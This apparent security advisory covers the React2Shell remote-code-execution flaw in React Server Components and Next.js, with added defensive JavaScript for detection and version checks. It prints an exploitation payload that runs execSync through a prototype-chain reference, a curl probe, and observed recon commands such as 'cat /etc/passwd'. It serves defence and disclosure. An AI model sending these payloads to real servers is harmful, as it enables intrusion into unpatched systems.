Attack

Multiple threat groups are exploiting the critical React/Next.js vulnerability

Take action: THIS IS URGENT: If you're running server-side React 19.x or Next.js 15.x/16.x (or frameworks built on React Server Components, such as Waku or RedwoodJS), attackers are already exploiting this flaw in the wild. Prioritize patching right now.



The critical-severity vulnerability affecting React Server Components, tracked as CVE-2025-55182 (CVSS score 10.0) and dubbed React2Shell, is already being exploited in the wild.

Amazon threat intelligence teams detected exploitation attempts immediately after disclosure, some of them highly sophisticated:

  • Infrastructure associated with Earth Lamia, a China-nexus threat actor known for exploiting web application vulnerabilities to target organizations across Latin America, the Middle East, and Southeast Asia, was observed attempting exploitation within hours of disclosure.
  • Infrastructure linked to Jackpot Panda, which primarily targets entities in East and Southeast Asia, was identified conducting scanning and exploitation activities. 

Attacks are persistent and methodical. In one instance, attackers operating from IP address 183.6.80.214 spent nearly an hour systematically troubleshooting their exploitation attempts, issuing 116 requests in total while cycling through multiple exploit payloads, Linux reconnaissance commands, file writes, and attempts to read sensitive system files. The same actors used automated scanning tools with detection-evasion features such as user-agent randomization, and were simultaneously exploiting other recent N-day vulnerabilities.

React2Shell is an unsafe deserialization flaw in the React "Flight" protocol, which React Server Components use to communicate between server and client. The trigger sits in how JavaScript resolves asynchronous values. When server code awaits (or otherwise resolves) a value, the runtime checks whether that value has a callable .then property and, if so, invokes it to register the continuation callbacks. Because the Flight deserializer can be coerced into producing an attacker-shaped object with its own .then, the attacker controls what runs at the exact moment the runtime calls .then to register that callback, and that is enough to execute arbitrary code.

First, the attacker crafts a malicious HTTP POST request containing a specially structured payload that abuses React's object reference system. Flight uses references such as $1 to link pieces of data together during serialization, but the vulnerability lets an attacker point a reference at internals that should never be reachable from the wire, such as the Function constructor or Node.js built-in modules like vm, child_process, and fs.

When the server receives the malformed payload, it fails to validate the structure during deserialization. Instead of restricting reference lookups to the payload's own properties, it walks the object's prototype chain without hasOwnProperty checks, so a reference like $1:constructor:constructor reaches the Function constructor and, from there, Node.js modules that should never be exposed to client-side input. The resulting object is then automatically "resolved" because it carries a .then property, which makes it look to the JavaScript runtime like a legitimate Promise (a "thenable").
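The two mechanisms just described can be reproduced in a few lines. The following is an added example, not React's code: a deliberately minimal model of "$id:key:key" reference resolution in a Flight-style deserializer, in an unsafe form beside a hardened one, plus the thenable sink that makes a deserialized object look like a Promise. The function names, the chunk layout, and the probe object are assumptions made for this illustration; the only real behaviours shown are JavaScript's prototype-chain property lookup and its treatment of objects with a callable .then.

```javascript
// Added example, not React's code: a simplified model of Flight-style "$<id>:<key>:..."
// reference resolution (unsafe and hardened) and of the thenable sink. All names here are
// assumptions for illustration; only the JavaScript semantics are real.
'use strict';

// Already-deserialized chunks keyed by id, as multipart fields "0", "1", ... would produce.
// Chunk 1 is the empty object from the probe's  -F '1="{}"'.
function chunksFromProbe() {
  return { '1': {} };
}

// UNSAFE: walks each path segment with plain property access, so inherited properties are
// reachable. "$1:constructor:constructor" goes {} -> Object -> Function.
function resolveReferenceUnsafe(chunks, ref) {
  const [id, ...path] = ref.slice(1).split(':'); // strip the leading "$"
  let value = chunks[id];
  for (const key of path) {
    value = value[key]; // no hasOwnProperty check: constructor, __proto__, ... all resolve
  }
  return value;
}

// HARDENED: only follows own properties of plain objects/arrays and rejects the keys that
// walk the prototype chain. Note JSON.parse('{"__proto__":{}}') yields an *own* property
// named __proto__, so the name itself is rejected rather than relying on hasOwnProperty.
function resolveReferenceSafe(chunks, ref) {
  const [id, ...path] = ref.slice(1).split(':');
  if (!Object.prototype.hasOwnProperty.call(chunks, id)) throw new Error(`unknown chunk ${id}`);
  let value = chunks[id];
  for (const key of path) {
    if (key === '__proto__' || key === 'constructor' || key === 'prototype') {
      throw new Error(`rejected key ${key}`);
    }
    if (value === null || typeof value !== 'object' ||
        !Object.prototype.hasOwnProperty.call(value, key)) {
      throw new Error(`not an own property: ${key}`);
    }
    value = value[key];
  }
  return value;
}

// The sink: whatever the server awaits, if it has a callable .then the runtime treats it as a
// thenable and invokes obj.then(resolve, reject) during promise resolution. A deserialized
// object therefore only needs a function-valued "then" to get code run.
async function awaitDeserialized(obj) {
  return await obj;
}

// Stand-in for the attacker-shaped object: records that its .then was invoked.
function makeThenableProbe() {
  const probe = { invoked: false };
  probe.then = function (resolve) {
    probe.invoked = true;
    resolve('then-was-called');
  };
  return probe;
}

async function main() {
  const chunks = chunksFromProbe();
  const F = resolveReferenceUnsafe(chunks, '$1:constructor:constructor');
  console.log('unsafe resolver reached Function:', F === Function);
  console.log('string compiled to code:', F('return 6 * 7')()); // 42: text became executable code
  try {
    resolveReferenceSafe(chunks, '$1:constructor:constructor');
  } catch (e) {
    console.log('hardened resolver:', e.message);
  }
  const probe = makeThenableProbe();
  const v = await awaitDeserialized(probe);
  console.log('awaited value:', v, '| then invoked:', probe.invoked);
}

if (typeof require !== 'undefined' && require.main === module) main();
```

The unsafe resolver turns a harmless-looking string into the Function constructor with no module imports at all, which is why the payload structure shown below needs nothing more than `$1:constructor:constructor` to reach code execution; the hardened resolver rejects the same reference before any lookup happens.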

Example Attack Payloads

Basic Detection Probe (Safe Test):

curl -v -k -X POST "http://target-server:3000/" \
  -H "Next-Action: 1337" \
  -F '1="{}"' \
  -F '0=["$1:a:a"]'

This probe triggers the parser error without executing any code. A vulnerable server returns 500 Internal Server Error with a response body containing E{"digest", while a patched server returns 400 Bad Request or ignores the malformed request.

Malicious Exploitation Payload Structure:

POST /_rsc HTTP/1.1
Host: victim.example.com
Content-Type: application/json
Next-Action: $@malicious_payload

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\": \"$B0\"}",
  "_response": {
    "_prefix": "process.mainModule.require('child_process').execSync('id > /tmp/pwned');",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

Observed Attack Patterns from Threat Actors:

Reconnaissance commands observed by AWS MadPot honeypot infrastructure:

  • whoami - User context enumeration
  • id - Permission level identification
  • uname -a - System information gathering
  • cat /etc/passwd - User account enumeration

File system manipulation attempts:

  • echo "compromised" > /tmp/pwned.txt - Write access verification
  • Attempts to create webshells in web-accessible directories
  • File exfiltration commands targeting sensitive configuration files

Attack Indicators:

  • HTTP POST requests to application endpoints with next-action or rsc-action-id headers
  • Request bodies containing the $@ pattern sequence
  • Request bodies with "status":"resolved_model" JSON patterns
  • Multipart/form-data requests where form keys contain both colon (:) delimiters and reference markers ($)
  • High volume of requests with these headers from single IP addresses
  • Unexpected execution of reconnaissance commands (whoami, id, uname) spawned by Node.js processes
  • Suspicious attempts to read /etc/passwd or other system configuration files
  • Unusual file writes to /tmp/ directory, particularly files named pwned.txt or similar
  • New child processes spawned by React/Next.js application processes
  • Outbound network connections initiated by Node.js processes to unexpected destinations
  • Sudden spikes in 500 Internal Server Errors on React Server Components endpoints
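The request-level indicators above can be checked mechanically against a web or proxy log. The following is an added example, not code from the page or from AWS: it scores one JSON record per request against those indicators and counts flagged requests per source IP. The log format (fields ip, method, path, status, headers, body) and the sample records are constructed for this example; the only rule that goes beyond the page's list is flagging Flight reference syntax inside multipart field values, which the detection probe shown earlier relies on.

```javascript
// Added example, not from the page or AWS: score request records against the React2Shell
// indicators listed above. Log format and sample records are constructed assumptions.
'use strict';

const RSC_ACTION_HEADERS = ['next-action', 'rsc-action-id'];

// Lower-case header names so matching is case-insensitive.
function lowerHeaders(headers) {
  return Object.fromEntries(
    Object.entries(headers || {}).map(([k, v]) => [k.toLowerCase(), String(v)]),
  );
}

// Return the indicators one request record matches (empty array if none).
function indicatorsFor(rec) {
  const hits = [];
  const headers = lowerHeaders(rec.headers);
  const body = rec.body || '';
  const actionHeader = RSC_ACTION_HEADERS.find((h) => h in headers);

  if (rec.method === 'POST' && actionHeader) hits.push(`header:${actionHeader}`);
  // "$@" may sit in the body or, as in the payload structure above, in the action header.
  if (body.includes('$@') || (actionHeader && headers[actionHeader].includes('$@'))) {
    hits.push('marker:$@');
  }
  if (/"status"\s*:\s*"resolved_model"/.test(body)) hits.push('body:resolved_model');

  if (/^multipart\/form-data/i.test(headers['content-type'] || '')) {
    const names = [...body.matchAll(/name="([^"]*)"/g)].map((m) => m[1]);
    if (names.some((n) => n.includes(':') && n.includes('$'))) hits.push('multipart:ref-in-key');
    // Extension beyond the page's list: the probe carries "$1:a:a" in a field value.
    if (/\$\d+:/.test(body)) hits.push('multipart:ref-in-value');
  }
  if (rec.status === 500 && actionHeader) hits.push('rsc:500');
  return hits;
}

// Scan JSON lines; report flagged requests, per-IP counts, and IPs at or above the threshold.
function analyze(lines, opts = {}) {
  const perIpThreshold = opts.perIpThreshold === undefined ? 5 : opts.perIpThreshold;
  const flagged = [];
  const perIp = {};
  for (const line of lines) {
    if (!line.trim()) continue;
    const rec = JSON.parse(line);
    const hits = indicatorsFor(rec);
    if (hits.length === 0) continue;
    flagged.push({ ip: rec.ip, path: rec.path, hits });
    perIp[rec.ip] = (perIp[rec.ip] || 0) + 1;
  }
  const noisyIps = Object.keys(perIp).filter((ip) => perIp[ip] >= perIpThreshold);
  return { flagged, perIp, noisyIps };
}

// Constructed sample records (RFC 5737 documentation addresses), one JSON object per line.
const SAMPLE_RECORDS = [
  { ip: '10.0.0.5', method: 'GET', path: '/', status: 200, headers: {}, body: '' },
  { ip: '10.0.0.5', method: 'POST', path: '/api/login', status: 200,
    headers: { 'content-type': 'application/json' }, body: '{"user":"alice"}' },
  // the detection probe from the page, as curl -F encodes it, answered with a 500
  { ip: '198.51.100.7', method: 'POST', path: '/', status: 500,
    headers: { 'next-action': '1337', 'content-type': 'multipart/form-data; boundary=b' },
    body: '--b\r\nContent-Disposition: form-data; name="1"\r\n\r\n"{}"\r\n' +
          '--b\r\nContent-Disposition: form-data; name="0"\r\n\r\n["$1:a:a"]\r\n--b--\r\n' },
  // three requests from one source shaped like the exploitation payload structure above
  { ip: '203.0.113.9', method: 'POST', path: '/_rsc', status: 500,
    headers: { 'next-action': '$@malicious_payload', 'content-type': 'application/json' },
    body: '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1}' },
  { ip: '203.0.113.9', method: 'POST', path: '/_rsc', status: 500,
    headers: { 'Next-Action': '$@malicious_payload', 'content-type': 'application/json' },
    body: '{"status": "resolved_model"}' },
  { ip: '203.0.113.9', method: 'POST', path: '/dashboard', status: 200,
    headers: { 'rsc-action-id': 'abc' }, body: '' },
];
const SAMPLE_LINES = SAMPLE_RECORDS.map((r) => JSON.stringify(r));

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(analyze(SAMPLE_LINES, { perIpThreshold: 3 }), null, 2));
}
```

A lone `header:next-action` hit is normal traffic for any App Router application (that is how server actions are invoked), so alerting should key on the combination of the action header with `marker:$@`, `body:resolved_model`, reference syntax in multipart fields, or a burst of `rsc:500` responses from one source, not on the header alone.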

The vulnerability affects React Server Components in React versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0, including the react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack packages. Next.js applications using the App Router feature in versions 14.3.0-canary.77 and later, all 15.x releases, and all 16.x releases are also vulnerable. 

The flaw was initially assigned a separate CVE identifier for Next.js (CVE-2025-66478) with the same maximum CVSS score of 10.0, but this was subsequently rejected by the National Vulnerability Database as a duplicate of CVE-2025-55182. Other frameworks and tools that bundle React Server Components are similarly affected, including the Vite RSC plugin, the Parcel RSC plugin, the React Router RSC preview, RedwoodJS, and Waku. 

Patched versions are now available. Organizations should immediately upgrade to React 19.2.1 (or the patched release of the 19.x line they are on, updating the react-server-dom-* packages alongside it) and, for Next.js, to 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9, or 15.0.5, whichever matches the minor line in use. 
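Deciding whether a deployed Next.js build is inside the affected range means comparing its installed version (from `npm ls next` or node_modules/next/package.json) against the per-line fixed releases above, including the prerelease canaries at the start of the range. The following is an added example, not tooling from the page or from the Next.js project: a small semver comparison applied to the version list above. Its one limitation is stated in the comments: only App Router applications are affected, and a version number cannot tell you whether the App Router is in use.

```javascript
// Added example, not from the page or the Next.js project: assess an installed Next.js
// version against the affected range and fixed releases listed above.
'use strict';

// Fixed releases per minor line, exactly as listed above.
const NEXT_FIXED_BY_LINE = {
  '16.0': '16.0.7',
  '15.5': '15.5.7', '15.4': '15.4.8', '15.3': '15.3.6',
  '15.2': '15.2.6', '15.1': '15.1.9', '15.0': '15.0.5',
};
const NEXT_AFFECTED_FROM = '14.3.0-canary.77';

// Parse "major.minor.patch[-prerelease][+build]"; the build metadata is ignored for ordering.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+[0-9A-Za-z.-]+)?$/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return { major: Number(m[1]), minor: Number(m[2]), patch: Number(m[3]),
           pre: m[4] ? m[4].split('.') : null };
}

// Semver prerelease identifier ordering: numeric before alphanumeric, numeric by value.
function compareIdentifiers(x, y) {
  const xn = /^\d+$/.test(x), yn = /^\d+$/.test(y);
  if (xn && yn) return Math.sign(Number(x) - Number(y));
  if (xn) return -1;
  if (yn) return 1;
  return x < y ? -1 : x > y ? 1 : 0;
}

// Returns -1, 0 or 1. A release outranks any prerelease of the same number
// ("14.3.0" > "14.3.0-canary.77"), and "canary.100" > "canary.77".
function compareVersions(a, b) {
  for (const k of ['major', 'minor', 'patch']) {
    if (a[k] !== b[k]) return a[k] < b[k] ? -1 : 1;
  }
  if (!a.pre && !b.pre) return 0;
  if (!a.pre) return 1;
  if (!b.pre) return -1;
  const n = Math.max(a.pre.length, b.pre.length);
  for (let i = 0; i < n; i++) {
    if (i >= a.pre.length) return -1; // shorter identifier list sorts first
    if (i >= b.pre.length) return 1;
    const c = compareIdentifiers(a.pre[i], b.pre[i]);
    if (c !== 0) return c;
  }
  return 0;
}

// status: 'not-affected' | 'vulnerable' | 'fixed' | 'unlisted'. Caveat: the page says only
// App Router applications are affected; that cannot be determined from the version alone.
function assessNextVersion(version) {
  const v = parseVersion(version);
  if (compareVersions(v, parseVersion(NEXT_AFFECTED_FROM)) < 0) {
    return { version, status: 'not-affected', fixed: null };
  }
  const line = `${v.major}.${v.minor}`;
  const fixed = NEXT_FIXED_BY_LINE[line];
  if (fixed === undefined) {
    // 14.3 canaries are inside the range with no fixed 14.x release listed above, so they are
    // vulnerable; any other unlisted line (newer than the list) needs manual confirmation.
    return { version, status: v.major === 14 ? 'vulnerable' : 'unlisted', fixed: null };
  }
  const status = compareVersions(v, parseVersion(fixed)) >= 0 ? 'fixed' : 'vulnerable';
  return { version, status, fixed };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const v of ['14.2.15', '14.3.0-canary.77', '15.5.6', '15.5.7', '16.0.6', '16.0.7']) {
    console.log(JSON.stringify(assessNextVersion(v)));
  }
}
```

Run it against the version actually installed in the deployment, not the range in package.json: a caret range such as ^15.5.0 says nothing about which build is on the server.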

Cloud infrastructure providers including AWS, Cloudflare, Akamai, Fastly, and Google Cloud have deployed automated protections through managed web application firewall rules; AWS, for example, has updated AWSManagedRulesKnownBadInputsRuleSet, and customers should be on version 1.24 or higher. These rules match known payload patterns and are not a substitute for patching: customers running React or Next.js applications in their own environments, such as Amazon EC2 instances, containers, or self-hosted deployments, must update vulnerable applications as soon as possible.

Organizations should treat this as an emergency patching event. 

Update - as of 6 December 2025, the Shadowserver Foundation reports that the vulnerability affects over 77,000 IP addresses globally, with active exploitation observed from 181 distinct source IPs in the past 24 hours, primarily in the Netherlands, China, and the US. More than 30 organizations have been compromised.

Update - as of 7 December 2025, a free tool was published to help detect and patch the vulnerability.
